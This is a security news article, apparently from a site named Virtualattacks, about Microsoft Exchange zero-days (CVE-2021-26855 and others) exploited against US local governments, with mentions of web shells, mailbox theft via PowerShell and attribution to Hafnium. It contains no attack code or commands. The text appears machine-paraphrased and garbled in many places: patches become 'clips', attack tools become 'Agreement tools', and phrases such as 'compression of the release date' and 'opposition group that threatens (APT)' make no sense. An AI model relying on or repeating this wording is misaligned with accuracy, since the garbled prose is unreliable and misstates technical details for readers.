Saturday, October 16, 2021

Microsoft Exchange zero-day exploited in attacks against US local governments

Must Read

Microsoft Exchange hack: Hackers breached the email servers of the European Banking Authority (EBA)

The European Banking Authority (EBA) on Sunday said it had been a victim of a cyberattack targeting its Microsoft...

There was an average of 419 new threats per minute In Q2 2020

McAfee published a report analyzing cybercriminal activity associated with malware along with also the growth of cyber dangers from...

Singapore investigating claims Muslim app developer sold user Information to US military

Singapore is investigating claims that a local-based mobile app, Muslim Pro, has offered"granular place data" into the US army....

Ongoing investigations into the active use of four Microsoft Exchange bugs has revealed attacks against US local government agencies.

On March 2, Microsoft warned that the current risk of zero-days – now tracked such as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 – was being exploited by attackers in the wild.

If abused, the vulnerability can be used to access data of servers using the Exchange Server 2013, 2016, and 2019 software.

Microsoft has urged customers to immediately use the provided clips to address the risk, but as is often the case with zero-day disclosures, cyber attackers are quick to exploit them.

According to the FireEye team of the Mandiant Managed Defense cybersecurity team, a wave of attacks targeted at the United States violated Exchange security breaches.

Among the latest victims are local government agencies, an unnamed university, an engineering firm, and a host of vendors in the United States.

This month, one threatening character was seen using at least one crash to install a web shell on the Exchange Exchange server to “establish persistence and second access,” according to the group. In two cases, cyber attackers want to delete existing administrator accounts on Exchange servers.

Verified theft, compression of the release date, and the use of PowerShell to steal all email inboxes were also recorded. Agreement tools, Nishang, and PowerCat are used to maintain remote access.

Mandiant added that the compromise of two other organizations, the Southeast Asian government, and the Central Asian communications company, may be related to the campaign.

“The work we have seen, combined with others in the information security industry, shows that these threatening players are likely to use the Exchange Server’s vulnerability to gain access to the environment,” Mandiant said. “This work is immediately followed by additional access and persistent processes.”

Microsoft has previously reported attacks on Hafnium, a Chinese government-sponsored opposition group that threatens (APT). APT has been linked to earlier attacks on US defense firms, the legal profession, researchers, and think tanks.

Mandiant expects more collections of intrusions to emerge, a problem that could continue until the endangered servers are announced. Kaspersky says there is a high risk of data theft and theft.

Microsoft Exchange users are urged to update their software as soon as possible.

On issues related to this week, the Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent directive instructing government agencies to respond immediately to the vulnerability of Microsoft Exchange.

Priyanshu Vijayvargiya
Founder and Editor-in-Chief of 'Virtualattacks Inc' Priyanshu Vijayvargiya is a cybersecurity analyst, Information Security professional, developer, and a white hat hacker.

Leave a reply

Please enter your comment!
Please enter your name here

Latest News

Unified endpoint management automation software to boost endpoint security

Endpoints are constantly connected to the internet, so they offer a gateway for cyberattacks. Endpoint security is simply the process...

Attackers Using Morse Code in phishing campaign to Evade Detection

Microsoft on Thursday revealed the techniques used by attackers to avoid detection using morse code in the phishing campaign.Microsoft also revealed the workings of...

Murata Manufacturing suffers data breach of employees and customer

Japanese electronic components manufacturer Murata has released an apology Notice for the data breach of thousands of files in June that contained bank account...

Everything about Signalling System 7(SS7)

Signaling System 7 (SS7) is an international telecommunication protocol standard that controls and regulates the network elements in a public switched telephone network (PSTN)....

Zimbra flaw lets attackers access the mail servers

Researchers discovered a flaw in the open-source Zimbra code. As a result, an attacker would gain unrestricted access to all sent and received emails...

More Articles Like This